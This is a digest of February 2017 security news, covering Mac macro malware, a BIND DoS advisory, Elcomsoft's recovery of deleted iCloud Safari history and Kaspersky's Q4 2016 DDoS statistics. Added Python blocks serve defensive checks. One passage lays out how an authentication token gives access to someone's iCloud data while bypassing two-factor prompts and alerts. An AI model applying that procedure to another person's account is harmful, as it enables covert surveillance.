Last week, security experts observed a spike in the distribution of spam messages with attachments embedding malicious macros. One of the baits was titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm”; when Mac recipients open the document, they are prompted to enable macros.


If a Mac user enables the macros, the file executes a Python function that downloads a malicious payload and runs it, infecting the machine. The Python code is publicly available as part of the open-source EmPyre project, and, as the researcher Patrick Wardle highlighted, this new attack leverages old tricks.

“Today, Monday the 6th, was a busy day for macOS malware! First, Nex (@botherder) posted a great writeup, iKittens: Iranian actor resurfaces with malware for mac (macdownloader)“, which detailed some new macOS malware. Shortly thereafter, my friend Scott (@0xdabbad00) brought to my attention the following tweet:

Snorre Fagerland @fstenv
#OSX #Macro #EmPyre "U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace" https://www.virustotal.com/en/file/07adb8253ccc6fee20940de04c1bf4a54a4455525b2ac33f9c95713a8a102f3d/analysis/ …
11:34 - 6 Feb 2017
A malicious Word document targeting Mac users? I was intrigued :). I grabbed the sample (“U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm”), noting that only 4 AV engines currently flagged it as malicious”

The analysis of the attack revealed that the IP address used by crooks to spread the malware is located in Russia and was not new to researchers monitoring phishing campaigns.

The security researcher Patrick Wardle explained that this Apple Mac malware is not sophisticated: the attack needs user interaction to compromise the machine.

The reliance on macros rather than a software vulnerability means that the attack can’t be blocked simply by patching systems.

“Overall this malware sample isn’t particularly advanced. It relies on user interaction (to open a malicious document in Microsoft Word, (not Apple’s Pages)), as well as needs macros to be enabled. Most users know never to allow macros – right!?! Moreover using an open-source implant likely ensures that detection software should detect it – right!?” concluded Wardle.

“However let’s be nice and give the attackers some credit. By using a macros in Word document they are exploiting the weakest link; humans! And moreover since macros are ‘legitimate’ functionality (vs. say a memory corruption vulnerability) the malware’s infection vector doesn’t have to worry about crashing the system nor being ‘patched’ out.”

Recently the security researchers Claudio Guarnieri and Collin Anderson have analyzed samples of the MacDownloader malware that was disguised by nation-state hackers as a Flash Player update and a Bitdefender adware removal tool.

According to the researchers, the malware was “poorly” developed at the end of 2016, and they noticed that its code was copied from other sources. When their analysis was written, MacDownloader was undetected by the virus scanning engines on VirusTotal; at the time of writing this post, only a dozen vendors recognize the bogus Flash Player and Bitdefender apps as a threat.

This latest case demonstrates that the Apple Mac threat landscape is very active; for this reason, awareness and a proper security posture are important for Mac users.


When choosing an EET system, the level of security should also be considered

13.2.2017 SecurityWorld Security
Hacker attacks on unsecured electronic sales records (EET) systems, loss or misuse of data, and the resulting penalties and criminal prosecution: these are the biggest risks of an ill-considered choice of EET solution, as formulated by eet1, one of the domestic vendors of EET systems.

According to eet1, the risks are significantly higher than those the Chamber of Commerce (HK) warned about recently. According to the Chamber, many entrepreneurs face fines and security risks because of a hasty connection to EET, above all sanctions for invalid receipts under the Accounting Act or for missing customer displays. The Chamber also warned of the risk of hacker attacks on cash registers and the loss of sensitive business information.

Less than three weeks remain before the launch of the second wave of EET, which covers retail and wholesale. Yet most entrepreneurs and companies still ignore the fact that the amended Act on Criminal Liability of Legal Entities (ZTOPO) took effect on 1 December 2016; under it, breaches of personal data protection obligations carry sanctions in the millions and criminal prosecution.

Furthermore, from May 2018 the General Data Protection Regulation (GDPR) will apply, which tightens these sanctions substantially, up to 20 million euros (or 4% of the company’s total worldwide annual turnover for the preceding financial year).

“These threats apply to anyone who underestimates the protection of data and personal information. By not knowing how secure the EET system they buy is, entrepreneurs expose themselves to a disproportionate risk of criminal prosecution,” explains Klaus Hornitschek of eet1.

According to him, the user bears full responsibility for protecting the data, and its entry into the system or device used, against misuse.

“It is similar to a payment card: you have to protect the PIN, use the card with a degree of caution and, of course, regularly review the transactions made to check whether any of them is fraudulent or suspicious,” adds Jiří Berger, security expert at eet1.


Turkish Man Sent to Prison in U.S. for $55M Cyber Heist

13.2.2017 securityaffairs Cyber
Turkish citizen Ercan Findikoglu, aged 35, was sentenced on Friday by a New York court to 8 years in prison for his leadership role in a cybercriminal organization that caused significant losses to banks worldwide.

Findikoglu, known online as “Segate,” “Predator” and “Oreon,” pleaded guilty in March to computer intrusion conspiracy, access device fraud conspiracy, and effecting transactions with unauthorized access devices. He faced nearly 58 years in prison.

According to authorities, between 2011 and 2013, the criminal gang Findikoglu was part of carried out three major campaigns that resulted in losses totaling more than $55 million.

The cybercrooks hacked into the systems of payment card processing companies, stole card data, including PINs, and eliminated withdrawal limits for those cards. The stolen card data was sent to other members of the group who encoded it onto the magnetic stripe of blank cards. The cards and their PINs were then distributed to a network of cashers who made thousands of fraudulent withdrawals at ATMs around the world.

In the first operation, which took place in February 2011, the fraudsters made 15,000 withdrawals in 18 countries, stealing roughly $10 million. In the next operation, in December 2012, they managed to steal approximately $5 million through 5,000 ATM transactions conducted in 20 countries.

The third and largest operation took place in February 2013, when the fraudsters withdrew roughly $40 million through 36,000 ATM transactions in 24 countries. Cashers in New York alone managed to obtain $2.4 million as a result of nearly 3,000 withdrawals.

Findikoglu was arrested in Germany in 2013 and extradited to the U.S. in 2015. Once he completes his prison sentence in the United States, he will be sent back to Turkey, where he has been sentenced to nearly 20 years in prison for payment card fraud.

The U.S. court that sentenced Findikoglu on Friday also ordered him to pay more than $55 million in restitution, but the New York Daily News reported that Turkish authorities seized all his assets and his current net worth is $150,000.

When they announced Findikoglu’s guilty plea back in March, U.S. authorities said they had already convicted dozens of other members of the cybercrime gang.


Apple kept deleted iCloud data

13.2.2017 SecurityWorld Apple
Elcomsoft noticed that Apple stores browsing history that users have already deleted. How serious can this problem be for users? It appears that Apple’s iCloud retains internet browsing history more than a year old that users deleted long ago. The Russian company Elcomsoft drew attention to the possible issue: it managed to extract supposedly deleted Safari browsing history from iCloud accounts, including the dates and times when users visited specific pages and when they subsequently deleted the records.

“We were able to access records that were more than a year old,” says Vladimir Katalov, head of Elcomsoft.

iCloud users can configure history storage so that it is accessible from all their devices. The Russians found, however, that even when a user deletes it, iCloud does not remove it completely but instead keeps it in a format the user can no longer see.

According to Katalov, keeping a copy of such records can be “invaluable for intelligence and investigative services”, though he adds that it is not entirely clear whether Apple even knew that iCloud retained the deleted data.

As soon as Elcomsoft drew attention to the matter, Apple began removing the affected records from iCloud, without commenting on the discovery in any way. “But maybe they are just moving them to other servers so that they can no longer be reached from outside,” adds Katalov, whose people by then could only reach records two weeks old.

This is not the first time Elcomsoft has pointed to a possible lapse by Apple. In the past it found that iCloud also stores users’ call history without offering users the option to turn this synchronization off.

Apple responded at the time that this is a convenience feature allowing users to return calls from any of their devices. Users concerned about their privacy can at least turn off the synchronization of browsing history.


Search engine companies will ban links published by major torrent hubs
13.2.2017 securityaffairs IT

Starting from June 1st, search engine companies will block queries for links to pirated content, including films, TV shows, and other copyright-protected content.
It will be even more difficult to search for torrents of ExtraTorrent, KickassTorrents, The Pirate Bay and equivalent services.

In the past copyright holders accused the search engine companies of doing too little to ban infringing links.


There have even been rumors that new legislation could force search engine companies to adopt drastic measures to tackle piracy.

Starting from June 1st, the major search engines will block any queries searching for specific pirated torrent files.

It will not be possible to find links to pirated content, including films, games, TV shows, music and other copyright-protected content. The search engine companies have joined the fight against online piracy.

The UK’s Intellectual Property Office is working with search engine companies and entertainment firms to reach an agreement on a series of measures to tackle piracy.

“Google and other search companies are close to striking a voluntary agreement with entertainment companies to tackle the appearance of infringing content links in search results.” reads a blog post published by TorrentFreak. “Following roundtable discussions chaired by the UK’s Intellectual Property Office, all parties have agreed that the code should take effect by June 1, 2017.”

The UK government has played a crucial role in reaching an agreement between the search engine giants and entertainment firms, and it seems that the parties are “extremely close” to signing an agreement.

“The search engines involved in this work have been very co-operative, making changes to their algorithms and processes, but also working bilaterally with creative industry representatives to explore the options for new interventions, and how existing processes might be streamlined,” said Baroness Buscombe in Parliament.

“I understand that all parties are keen to finalize and sign up to the voluntary agreement, and so we believe there is no need to take a legislative power at this time.”

“All parties have also agreed that the code should take effect, and the targets in it be reached, by 1 June this year,” the Baroness added.

It will be very interesting to see whether such an agreement reached in the UK could be effective overseas.


A new serious DoS flaw affects BIND DNS software, update it now
12.2.2017 securityaffairs Attack

A new serious denial-of-service (DoS) vulnerability was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.
A serious denial-of-service (DoS) vulnerability, tracked as CVE-2017-3135, was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.

The vulnerability in the BIND DNS software was reported by Ramesh Damodaran and Aliaksandr Shubnik of Infoblox.

The DoS flaw affects BIND 9.8.8, all 9.9 releases since 9.9.3, all 9.10 releases, and all 9.11 releases.

The flaw has been patched with the release of versions 9.9.9-P6, 9.10.4-P6 and 9.11.0-P3.

The flaw, rated as “high severity” (CVSS score of 7.5), is remotely exploitable on servers using certain configurations.

“Some configurations using both DNS64 and RPZ can lead to an INSIST assertion failure or a NULL pointer read; in either case named will terminate.” reads the advisory published by the ISC.

“Under some conditions when using both DNS64 and RPZ [Response Policy Zones] to rewrite query responses, query processing can resume in an inconsistent state leading to either an INSIST assertion failure or an attempt to read through a NULL pointer.”

Only servers utilizing both DNS64 and RPZ at the same time are potentially vulnerable.

“When this condition occurs, it will result in either an INSIST assertion failure (and subsequent abort) or an attempt to read through a NULL pointer. On most platforms a NULL pointer read leads to a segmentation fault (SEGFAULT), which causes the process to be terminated,” ISC added.

The advisory recommends updating each vulnerable installation; it also lists possible workarounds, such as removing either DNS64 or RPZ from the configuration, or restricting the contents of the policy zone.
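As an added example (not code from ISC or from the advisory), the following Python check lets a defender turn the version ranges and the "both DNS64 and RPZ" condition described above into an inventory test: it parses the version printed by `named -v`, compares it against the affected ranges and fixed releases listed in the article, and looks for both directives in named.conf while ignoring commented-out lines. The named.conf fragment and the `named -v` output in the block are constructed for the example.

```python
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, P-level)

# Fixed releases named in the ISC advisory: 9.9.9-P6, 9.10.4-P6, 9.11.0-P3.
FIXED = {
    (9, 9): (9, 9, 9, 6),
    (9, 10): (9, 10, 4, 6),
    (9, 11): (9, 11, 0, 3),
}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-P(\d+))?")
# C-style, C++-style and shell-style comments are all legal in named.conf.
_COMMENT_RE = re.compile(r"/\*.*?\*/|//[^\n]*|#[^\n]*", re.S)


def parse_bind_version(text: str) -> Optional[Version]:
    """Extract (major, minor, patch, P) from a string such as
    'BIND 9.10.4-P6 <id:...>' (the form printed by `named -v`) or '9.9.3'.
    A release without a -P suffix gets P-level 0."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_affected(text: str) -> bool:
    """True if the version falls in the ranges the advisory lists as affected:
    9.8.8, 9.9.3 and later 9.9.x, and every 9.10.x and 9.11.x release
    older than the corresponding fixed release."""
    v = parse_bind_version(text)
    if v is None:
        raise ValueError(f"no BIND version found in {text!r}")
    major, minor, patch, _ = v
    if (major, minor, patch) == (9, 8, 8):
        return True
    if (major, minor) == (9, 9):
        return patch >= 3 and v < FIXED[(9, 9)]
    fixed = FIXED.get((major, minor))
    return fixed is not None and v < fixed


def config_uses_dns64_and_rpz(named_conf: str) -> bool:
    """The crash is reachable only when a dns64 block and a response-policy
    statement are both active, so strip comments first (a commented-out
    directive must not count) and then require both directives."""
    active = _COMMENT_RE.sub("", named_conf)
    has_dns64 = re.search(r"\bdns64\b", active) is not None
    has_rpz = re.search(r"\bresponse-policy\b", active) is not None
    return has_dns64 and has_rpz


def assess(version_text: str, named_conf: str) -> Tuple[bool, str]:
    """Combine both checks and return (exposed, reason)."""
    affected = version_affected(version_text)
    both = config_uses_dns64_and_rpz(named_conf)
    if affected and both:
        return True, ("affected release with DNS64 and RPZ both enabled: "
                      "upgrade, or remove one of the two as a workaround")
    if affected:
        return False, "affected release, but DNS64 and RPZ are not both configured"
    return False, "release already carries the fix"


# Constructed named.conf fragment (not from any real server) enabling both features.
SAMPLE_NAMED_CONF = """\
options {
    directory "/var/named";
    // DNS64 synthesis for IPv6-only clients
    dns64 64:ff9b::/96 {
        clients { any; };
    };
    response-policy { zone "rpz.example"; };   # RPZ rewriting
};
"""

if __name__ == "__main__":
    # Constructed `named -v` output for a release the advisory lists as affected.
    exposed, why = assess("BIND 9.10.4 <id:constructed>", SAMPLE_NAMED_CONF)
    print("exposed" if exposed else "not exposed", "-", why)
```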

In January 2017, the Internet Systems Consortium (ISC) issued updates to fix four high severity flaws in the BIND DNS software. The flaws could be exploited by a remote attacker to cause a DoS condition.

An attacker can exploit the vulnerabilities to cause the BIND name server process to encounter an assertion failure and stop executing.


Apple’s iCloud saved the deleted Safari browsing history over the years
12.2.2017 securityaffairs Apple

According to the Russian forensic firm Elcomsoft, Apple iCloud has saved deleted Safari browsing history over the years, opening the door to surveillance.
According to digital forensics firm Elcomsoft, Apple iCloud retained deleted Safari browsing history over the years. The experts at Elcomsoft discovered the issue while trying to extract records from iCloud accounts: they were able to retrieve supposedly deleted Safari browser histories from the accounts, including the date and time each website was visited and when the record was deleted.
Safari history is synced across the devices used by a specific iCloud account. When the user deletes a record on one device, it will disappear on all other devices in a few seconds when the devices are connected to the Internet.

Users can set iCloud to store their browsing history, in this way it will be available from all the user’s connected devices. The researchers discovered that even if the user deletes the history, iCloud doesn’t actually erase it but keeps it in a format invisible to the user.

“However, those same records will be kept in Apple iCloud for much longer. In fact, we were able to access records dated more than one year back. The user does not see those records and does not know they still exist on Apple servers.” reads a blog post published by the Elcomsoft’s CEO Vladimir Katalov.


The experts used the Elcomsoft Phone Breaker forensic tool to extract files from an iCloud account.

How does it work?

In order to extract Safari history from iCloud it is necessary to be authenticated to the user’s Apple ID. The operation can be carried out using login credentials or by using an authentication token extracted from the user’s computer. The authentication tokens are automatically created by iCloud Control Panel on Windows and Mac computers that were synced with iCloud.

The Elcomsoft Phone Breaker can be used by experts to extract iCloud authentication tokens.

“By using the token to log in, you’ll bypass both the password and the secondary authentication prompt if two-factor authentication is enabled on the user’s account. As a result, iCloud access alert will not be delivered to the user.” states the post.

Below is the procedure to extract Safari browsing history from iCloud with Elcomsoft Phone Breaker:

Launch Elcomsoft Phone Breaker 6.40 or newer
Click “Download Synced Data from iCloud”
Authenticate with Apple ID/password or binary authentication token
Specify everything you’d like to download. Make sure to check “Safari”
Safari browsing history

The forensic implication of the discovery is serious because it makes surveillance activity possible, as explained in the post.

“Forensic use of synced data is hard to underestimate. Unlike cloud backups that are created daily at best, iCloud sync works nearly in real-time. Being able to track a suspect’s activities with almost no delay can be invaluable for surveillance and investigations.” states Katalov.

“Since deleting browsing history from iCloud is nearly impossible for the user, discovering illicit activities becomes much easier. Experts will be able to recover visits to extremist and other illicit Web sites even if the suspect deletes their browser history or wipes their iPhone.”

Keeping a copy of a user’s browser history can certainly be “invaluable for surveillance and investigations,” Katalov said. But it’s unclear if Apple knew that its iCloud service was storing the deleted records.

Apple didn’t immediately respond to a request for comment, but experts from Elcomsoft noticed that after they disclosed the issue, Apple started “purging” older browser history records from iCloud.

“we have informed media about this issue in advance, and they reached Apple for comments. As far as we know, Apple has not responded, but started purging older history records. For what we know, they could be just moving them to other servers, making deleted records inaccessible from the outside; but we never know for sure. Either way, as of right now, for most iCloud accounts we can see history records for the last two weeks only (deleted records for those two weeks are still there though).” states the blog post. As a result, only deleted records up to two weeks old can now be extracted, the forensic company said.

Elcomsoft suggests disabling the syncing of Safari browsing history from iCloud.


A US minor is behind the cyber attack that hit Brussels airport after bombings
12.2.2017 securityaffairs Cyber

Prosecutors confirmed that the failed cyber attack on Brussels airport a few hours after 2016 bombings was launched by a US minor.
Prosecutors confirmed that the failed cyber attack on Brussels airport a few hours after dramatic 2016 bombings in Belgium’s capital was launched by a US minor.

In March 2016, suicide bombers attacked Zaventem airport and a metro station in the Belgian capital, killing thirty-two people.

“Many more were injured in the attacks. The toll did not include three bombers who died. So-called Islamic State said it was behind the attacks.” reported the BBC.

The US youngster, a 14-year-old based in Pittsburgh, has admitted having launched a cyber attack on the systems of the Brussels airport.

The young hacker launched a cyber attack against the airport’s computer system on the night of 22-23 March 2016, but the cyber incursion failed.

“In a statement on Thursday, Belgium’s federal prosecutors say the attempt to take down Zaventem’s website and hack into the airport’s computer system on the night of 22-23 March 2016 was unsuccessful.” continues the BBC.

The Belgium authorities conducted a joint investigation with the FBI that allowed them to identify the US minor, who “confessed having committed the acts”.

The cyber attack had “no terrorist motives” and, according to prosecutors, it was not related to the Brussels bombings.

According to the prosecutors, the FBI identified and interrogated a minor of American nationality who “confessed having committed the acts”.

“From the investigation and the first analyses of the seized hardware it appeared that there were no terrorist motives,” the statement added.

The prosecutors declined to disclose further information on the case because the investigation is ongoing.

Let me close with an observation on the case:

The lack of awareness of what constitutes a cyber crime. The vast majority of youngsters hack out of boredom or to satisfy their egos, but completely ignore the consequences of a cyber attack. These attacks can have serious consequences, especially in conjunction with tragic events such as those that occurred in Brussels. It is necessary to instill awareness in young people and stimulate debate on cyber issues.

Youngsters could be easily manipulated by threat actors (i.e. terrorists, nation-state actors, cyber criminals) and we cannot underestimate the effectiveness of their activities in cyberspace. Young people are a precious resource for modern society, but unaware ones could represent a dangerous threat.


DDoS attacks in Q4 2016
12.2.2017 Kaspersky Attack

Without doubt, 2016 was the year of Distributed Denial of Service (DDoS) with major disruptions in terms of technology, attack scale and impact on our daily life. In fact, the year ended with massive DDoS attacks unseen before, leveraging Mirai botnet technology, whose first appearance was covered in our last DDoS Intelligence Report.

Since then, we have published several other detailed reports dedicated to major attacks on Dyn’s Domain Name System (DNS) infrastructure, on Deutsche Telekom, which knocked 900K Germans offline in November. Additionally, we tracked similar attacks on Internet service providers (ISPs) in Ireland, the United Kingdom and Liberia all leveraging IoT devices controlled by Mirai technology and partly targeting home routers in an attempt to create new botnets.

Although ‘Rise of the Machines‘, as the Institute for Critical Infrastructure Technology (ICIT) titled its analysis, sounds quite blatant, it clearly shows that stakeholders worldwide, in particular in the United States and the European Union, recognize the lack of security inherent in the functional design of IoT devices and the need to set up a common IoT security ecosystem. And not before time, as we expect to see the emergence of further Mirai botnet modifications and a general increase in IoT botnet activity in 2017.

Altogether, the DDoS attacks we have seen so far are just a starting point initiated by various actors to draw up IoT devices into the actors’ own botnets, test drive Mirai technology and develop attack vectors. The DDoS attacks on five major Russian banks in November are a very good example of this.

First, they demonstrate once again that financial services like the bitcoin trading and blockchain platforms CoinSecure of India and BTC-e of Bulgaria, or William Hill, one of Britain’s biggest betting sites, which took days to come back to full service, were at the highest risk in the fourth quarter and are likely to remain so throughout 2017.

Second, cybercriminals have learnt to manage and launch very sophisticated, carefully planned, and constantly changing multi-vector DDoS attacks adapted to the mitigation policy and capacity of the attacked organization. As per our analysis, the cybercriminals in several other cases we tracked in 2016 started with a combination of various attack vectors gradually checking out a bank’s network and web services to find a point of service failure. Once DDoS mitigation and other countermeasures were initiated, the attack vectors changed over a period of several days.

Overall, these attacks show that the DDoS landscape entered the next stage of its evolution in 2016 with new technology, massive attack power, as well as highly skilled and professional cybercriminals. Unfortunately, this tendency has not yet found its way into the cybersecurity policies of many organizations that are still not ready or are unclear about the necessary investments in DDoS protection services.

Four main trends of the year

In 2016, the DDoS attack market saw a number of significant changes and developments. We have identified the four major trends:

The demise of amplification-type attacks. These attacks have been around for a while and the methods for combating them are well-known and have been perfected over time. They remained quite popular in the first half of 2016, but it was clear their number and volume were gradually declining. By the end of 2016, cybercriminals had almost completely given up using malicious amplification-type attacks, ending a downward trend that had lasted several years. First of all, this is the result of countermeasures being developed for these attacks. It’s also down to a reduction in the number of vulnerable amplification hosts available to the attackers (DNS Amplification attacks are the best illustration of this) as their owners react to the performance problems and losses associated with these attacks and look for ways to patch vulnerabilities.

Rising popularity of attacks on applications and the growth in their use of encryption. For the last few years UDP-based amplification attacks have remained the undisputed leader on the DDoS attack market, while attacks on applications have been relatively rare. In the second half of the year, and particularly in Q4, there was a dramatic increase in the popularity of attacks on applications, which gradually filled the niche previously occupied by amplification attacks. To organize such attacks, time-tested tools (Pandora, Drive, LOIC/HOIC) and new developments are used. Along with the growing popularity of attacks on applications, the number of these attacks using encryption is also growing. The use of encryption in most cases dramatically increases the efficiency of attacks and makes filtering them more difficult. In addition, cybercriminals continue to use an integrated approach, masking a small but effective attack on applications behind a simultaneous large-scale attack, for example, an attack involving a large number of short network packets (short-packet TCP flood).

The rise in popularity of WordPress Pingback attacks. WordPress Pingback-type attacks, which were extremely rare at the start of 2016, had by the fourth quarter occupied a substantial amount of the DDoS attack market. This is currently one of the most popular attack methods targeting applications, and we consider them separately from the overall mass of attacks at the application level. Relatively simple to organize, the “fingerprint” of these attacks is very specific, and the corresponding traffic can be easily separated from the general traffic flow. However, carrying out such an attack using encryption (something that was observed by Kaspersky Lab experts in Q4 2016) greatly complicates filtering and increases the malicious potential of this type of attack.

Use of IoT botnets to carry out DDoS attacks. After the publication of code on the GitHub resource on 24 October, Kaspersky Lab experts noticed a surge in interest in IoT devices among criminals, especially their use in botnets to perform DDoS attacks. The concepts and methods demonstrated by the creators of the Mirai botnet were used as the basis for a large number of new malicious codes and botnets consisting of IoT devices. These kinds of botnets were used in numerous attacks on Russian banks in Q4 2016. Unlike classic botnets, IoT-based botnets are huge in terms of both their volume and potential, something that was proved by the high-profile attack on the DNS DYN provider, which indirectly affected the work of many major web resources (e.g., Twitter, Airbnb, CNN and many others).
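The Pingback fingerprint mentioned above is the user agent a WordPress site sends when it verifies a pingback, of the form “WordPress/<version>; <site URL>; verifying pingback from <IP>”. The following Python is an added example, not Kaspersky Lab code: it runs that check over constructed web-server log lines to flag a one-minute window in which many distinct WordPress hosts are reflecting requests at one server; the log format, sample lines and thresholds are assumptions.

```python
"""Flag WordPress Pingback reflection traffic in combined-format access logs.

Added example (not Kaspersky code). Reflected pingback verification
requests carry the WordPress user agent
'WordPress/<ver>; <site URL>; verifying pingback from <ip>', so the
fingerprint is the UA string, not the request path. Thresholds below are
placeholders to tune per site."""
import re
from collections import defaultdict

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# 'caller' is the IP that submitted the pingback to the WordPress site,
# as that site reports it; the reflecting site itself is 'site'.
PINGBACK_UA = re.compile(
    r'^WordPress/(?P<ver>[\d.]+); (?P<site>\S+); '
    r'verifying pingback from (?P<caller>\S+)$'
)

# Constructed sample: three different WordPress sites reflect requests at
# the same server within one minute, mixed with ordinary browser traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Nov/2016:10:00:01 +0000] "GET /?p=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.11 - - [05/Nov/2016:10:00:02 +0000] "GET /?4561=4561 HTTP/1.1" 200 9120 "-" "WordPress/4.6.1; http://blog-a.example; verifying pingback from 192.0.2.9"
198.51.100.12 - - [05/Nov/2016:10:00:02 +0000] "GET /?4562=4562 HTTP/1.1" 200 9120 "-" "WordPress/4.5.3; http://blog-b.example; verifying pingback from 192.0.2.9"
198.51.100.13 - - [05/Nov/2016:10:00:03 +0000] "GET /?4563=4563 HTTP/1.1" 200 9120 "-" "WordPress/4.7; http://blog-c.example; verifying pingback from 192.0.2.9"
198.51.100.11 - - [05/Nov/2016:10:00:04 +0000] "GET /?4564=4564 HTTP/1.1" 200 9120 "-" "WordPress/4.6.1; http://blog-a.example; verifying pingback from 192.0.2.9"
203.0.113.6 - - [05/Nov/2016:10:00:05 +0000] "GET /about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def pingback_requests(lines):
    """Yield parsed requests whose UA matches the WordPress pingback fingerprint."""
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        pb = PINGBACK_UA.match(rec["ua"])
        if pb:
            rec.update(pb.groupdict())
            yield rec


def summarize(lines):
    """Per one-minute bucket: reflected request count, distinct reflecting
    sites and distinct reported callers."""
    per_minute = defaultdict(lambda: {"requests": 0, "sites": set(), "callers": set()})
    for rec in pingback_requests(lines):
        minute = rec["ts"][:17]  # 'dd/Mon/yyyy:HH:MM'
        bucket = per_minute[minute]
        bucket["requests"] += 1
        bucket["sites"].add(rec["site"])
        bucket["callers"].add(rec["caller"])
    return dict(per_minute)


def is_pingback_flood(lines, min_sites=3, min_requests=4):
    """True when any one-minute window shows at least min_requests reflected
    requests coming from at least min_sites distinct WordPress hosts."""
    return any(
        b["requests"] >= min_requests and len(b["sites"]) >= min_sites
        for b in summarize(lines).values()
    )


if __name__ == "__main__":
    for minute, b in summarize(SAMPLE_LOG.splitlines()).items():
        print(minute, b["requests"], "requests from", len(b["sites"]), "WordPress sites")
    print("pingback flood:", is_pingback_flood(SAMPLE_LOG.splitlines()))
```

Because the fingerprint is the UA string, the same match can drive an edge rule that drops such requests before they reach the application, while the WordPress site owners on the reflecting side close the hole by disabling pingbacks.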

Statistics for botnet-assisted DDoS attacks

Methodology

Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.

DDoS Intelligence (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.

This report contains the DDoS Intelligence statistics for the fourth quarter of 2016.

In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.

The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.

It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.
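As an added illustration of the counting rules above (not Kaspersky’s code), the following Python groups constructed botnet command observations into attacks using the 24-hour break rule, separately per target and per botnet, and builds the per-day timeline in which a multi-day attack is counted once on each day it spans, as the footnote to the attack timeline chart in this report describes. The event format and sample values are assumptions.

```python
"""Group botnet C&C command observations into DDoS attacks using the
report's counting rule (a break of less than 24 hours keeps one attack;
same target plus same botnet identifies it) and build the per-day timeline.

Added example, not Kaspersky code; the event format is an assumption."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

GAP = timedelta(hours=24)

# Constructed sample: (target IP, botnet id, time an attack command was seen).
EVENTS = [
    ("203.0.113.10", "botA", "2016-11-04 22:00"),
    ("203.0.113.10", "botA", "2016-11-05 06:00"),  # break of 8h: same attack
    ("203.0.113.10", "botA", "2016-11-07 09:00"),  # break > 24h: new attack
    ("203.0.113.10", "botB", "2016-11-05 01:00"),  # other botnet: separate attack
    ("198.51.100.7", "botA", "2016-11-05 03:00"),
    ("198.51.100.7", "botA", "2016-11-05 20:00"),  # break of 17h: same attack
]


def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M")


def group_attacks(events):
    """Return a list of (target, botnet, start, end) attack records."""
    by_key = defaultdict(list)
    for target, botnet, ts in events:
        by_key[(target, botnet)].append(parse(ts))
    attacks = []
    for (target, botnet), times in by_key.items():
        times.sort()
        start = end = times[0]
        for t in times[1:]:
            if t - end < GAP:       # activity resumed within 24h: same attack
                end = t
            else:                   # longer break: close and open a new attack
                attacks.append((target, botnet, start, end))
                start = end = t
        attacks.append((target, botnet, start, end))
    return attacks


def duration_hours(attack):
    _, _, start, end = attack
    return (end - start).total_seconds() / 3600


def unique_targets(attacks):
    """Targets are counted by unique IP address, as in the report."""
    return {a[0] for a in attacks}


def daily_counts(attacks):
    """Count each attack once for every calendar day it spans."""
    counts = Counter()
    for _, _, start, end in attacks:
        day = start.date()
        while day <= end.date():
            counts[day.isoformat()] += 1
            day += timedelta(days=1)
    return dict(counts)


if __name__ == "__main__":
    found = group_attacks(EVENTS)
    print(len(found), "attacks on", len(unique_targets(found)), "targets")
    print("longest:", max(duration_hours(a) for a in found), "hours")
    print("per day:", daily_counts(found))
```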

Q4 Summary

Resources in 80 countries (vs. 67 in Q3) were targeted by DDoS attacks in Q4 2016.
71.6% of targeted resources were located in China.
South Korea, China and the US remained leaders in terms of both the number of targets and number of detected C&C servers.
The longest DDoS attack in Q4 2016 lasted for 292 hours (or 12.2 days) – significantly longer than the previous quarter’s maximum (184 hours, or 7.7 days) and set a record for 2016.
SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios. The proportion of attacks using the SYN DDoS method decreased by 5.7 p.p., while the shares of both TCP DDoS and HTTP DDoS grew considerably.
In Q4 2016, the percentage of attacks launched from Linux botnets decreased slightly and accounted for 76.7% of all detected attacks.
Geography of attacks

In Q4 2016, the geography of DDoS attacks expanded to 80 countries, with China accounting for 76.97% (4.4 p.p. more than the previous quarter). The US (7.3%) and South Korea (7%) were once again second and third respectively.

The Top 10 most targeted countries accounted for 96.9% of all attacks. Canada (0.8%) appeared in the rating, replacing Italy. Russia (1.75%) moved from fifth to fourth thanks to a 0.6 p.p. decline in Vietnam’s share.

Distribution of DDoS attacks by country, Q3 2016 vs. Q4 2016

Statistics for the fourth quarter show that the 10 most targeted countries accounted for 96.3% of all DDoS attacks.

Distribution of unique DDoS attack targets by country, Q3 2016 vs. Q4 2016

